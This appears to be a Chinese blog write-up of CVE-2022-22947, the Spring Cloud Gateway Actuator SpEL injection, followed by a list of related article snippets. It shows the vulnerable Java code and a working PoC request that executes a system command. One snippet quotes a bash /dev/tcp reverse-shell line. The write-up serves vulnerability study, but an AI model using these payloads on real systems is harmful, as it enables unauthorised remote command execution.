[CVE-2022-22947]Spring Cloud Gateway Actuator API SpEL表达式注入命令执行

最新推荐文章于 2025-04-06 21:05:51 发布
原创 最新推荐文章于 2025-04-06 21:05:51 发布 · 4.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#gateway #spring #安全

本文详细介绍了SpringCloudGateway在3.1.0及3.0.6版本之前存在的SpEL表达式注入漏洞,攻击者可以通过访问Actuator API执行任意命令。分析了漏洞源于ShortcutConfigurable.java中未正确过滤带有SpEL表达式的配置。提供了一个概念验证POC,展示了如何利用该漏洞进行命令执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、背景

    Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

二、漏洞分析

ShortcutConfigurable.java :

static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory, String entryValue) {
	Object value;
	String rawValue = entryValue;
	if (rawValue != null) {
		rawValue = rawValue.trim();
	}
	if (rawValue != null && rawValue.startsWith("#{") && entryValue.endsWith("}")) {
		// assume it's spel
		StandardEvaluationContext context = new StandardEvaluationContext();
		context.setBeanResolver(new BeanFactoryResolver(beanFactory));
		Expression expression = parser.parseExpression(entryValue, new TemplateParserContext());
		value = expression.getValue(context);
	}
	else {
		value = entryValue;
	}
	return value;
}

StandardEvaluationContext允许任意的表达式被调用。

三、漏洞概念复现POC

POST /actuator/gateway/routes/hacktest HTTP/1.1
{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
  }],
"uri": "http://example.com",
"order": 0
}

来源:

vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub

Spring Cloud Gateway Actuator API SpEL 代码注入(CVE-2022-22947)漏洞复现
千寻的博客
03-30 2770
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞发现实验环境复现步骤第一步 发送以下请求第二步 刷新网关。第三步 发送以下请求以检索结果第四步 发送一个 DELETE 请求第五步 再次刷新网关第六步 补充第七步 关闭漏洞环境修复建议免责声明 漏洞名称 Spring Cloud Gateway Actuator API SpEL 代码注入 漏洞编号 CVE-2022-22947 漏洞描述 Spring Cloud Gateway 提供了一个库,用于在 Spring WebFlux 之上构建 API 网关
CVE-2022-22947 Spring Cloud Gateway SpEL 表达式注入 RCE漏洞复现
afei001
03-05 4965
当启用和暴露 Gateway Actuator 端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
god_Zeo的安全博客
03-06 5138
0x01 Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。华为云提醒使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。 参考链接: CVE-2022-22947: Spring Cloud Gateway Code Injection Vulnerability CVE-2022-22947: SPEL CASTING AND EVIL
漏洞复现----42、Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947)
七天
06-30 1378
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947)
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
大壮
12-26 178
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞复现
Tauil的博客
07-25 1036
查看其路由规则,因为这是个靶场,所以肯定是允许你访问的,正经网站肯定是不会给你访问的,打开burpsuite进行放包,我们需要添加一个新的路由到网关,添加新的路由需要用。表达式,所以我们可以选择任一过滤器进行使用,这里使用过滤器。然后使用refresh刷新路由配置,refresh也需要用。,并且可以看到他已经成功执行了我们输入的命令whoami。查看到路由表配置,此时可以看到多出了我们新添加的路由路径。方式提交,而网关最终会将所有的请求交给过滤链表。进行处理,所以我们将待执行的命令放到。...
Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)
yang1234567898的博客
04-25 3476
概念: 什么是spring cloudSpring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易
Spring Cloud Function Spel表达式注入
weixin_45794666的博客
04-05 6167
Spring Cloud Function Spel表达式注入 漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),支持基于SpEL的函数式动态路由。在特定配置下,3 <= 版本 <= 3.2.2( commit dc5128b 之前)存在SpEL表达式执行导致的RCE。 环境搭建 在IDEA中选择新建项目,然后选择Spring Initializr,输入随机项目名称,然后选择java版本和jdk版本后点击下一步。 选择Spring
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
00勇士王子的博客
03-23 652
[Vulfocus解题系列] Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
CVE-2022-22947 分析
KeJiGuaiKa的博客
09-01 274
的官方补丁 [Comparing v3.0.6…v3.0.7 · spring-cloud/spring-cloud-gateway],官方在。在关键位置打上断点后,运行 app 尝试进入漏洞点。翻阅下官方文档 Spring Cloud Gateway[^1] 看下如何定义一个简单的路由。那如何通过远程触发呢?根据 Gateway Actuator API [^2] 文档,接口提供了创建路由的能力 其中 json 构造方式如文档中的。通过 POST 发送 exp。debug 程序后,发现。...
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE复现
问题很多的小明
03-03 1490
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE复现
Spring Cloud Function SpEL表达式注入(CVE-2022-22963)
李同學的安全圈
04-02 1447
文章目录声明前言一、漏洞概述二、影响版本三、本地复现四、漏洞原理五、官方修复文档 声明 本文章仅用于漏洞复现和技术学习,切勿从事非法渗透行为,切记! 前言 在 Spring Cloud Function 版本 3.1.6、3.2.2 和不受支持的旧版本中,当使用路由功能时,用户可以提供特制的 SpEL 作为路由表达式,这可能导致远程代码执行和对本地资源的访问。 一、漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由 funct
Spring Cloud Function SpEL表达式命令注入CVE-2022-22963)
最新发布
qq_62691506的博客
04-06 199
由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。将反弹shell bash -i >& /dev/tcp/监听机ip/监听端口号 0>1& 进行base64加密。出现错误页面,利用burp抓包修改请求路径方法。
Spring Cloud Function SpEL表达式注入漏洞poc验证
weixin_42016744的博客
03-30 5326
spring cloud曝出核弹级漏洞,利用十分简单,在java9以上的spring上通杀,预计影响不亚于去年的log4j漏洞。目前还无CVE编号
CVE-2022-22963 Spring Cloud Function SPEL表达式注入漏洞复现
afei001
03-31 4334
SpringCloudFunction是SpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行
Spring Cloud Gateway Actuator API SpEL代码注入
小白的博客
04-18 2543
CVE-2022-22947 Spring Cloud Gateway Actuator API SpEL代码注入 影响版本 Spring Cloud GateWay 3.0.0以下,3.1.0,3.0.0~3.0.6 漏洞描述 ​ Gateway是在Spring生态系统之上构建的API网关服务,基于Spring 5、Spring Boot 2和Project Reactor等技术。Gateway旨在提供-种简单而有效的方式来对API进行路由, 以及提供一些强大的过滤器功能, 例如: 熔断、限流、
Spring Cloud Function SpEL表达式命令注入CVE-2022-22963)漏洞复现
weixin_54786196的博客
10-27 561
Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用该漏洞远程执行任意代码。
CVE-2022-22947Spring Cloud Gateway中的SPEL远程代码执行分析
"分析CVE-2022-22947Spring Cloud Gateway中的SPEL远程代码执行漏洞" CVE-2022-22947 是一个针对Spring Cloud Gateway安全漏洞,该漏洞可能导致Spring Cloud Gateway的用户面临远程代码执行(RCE)的风险。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值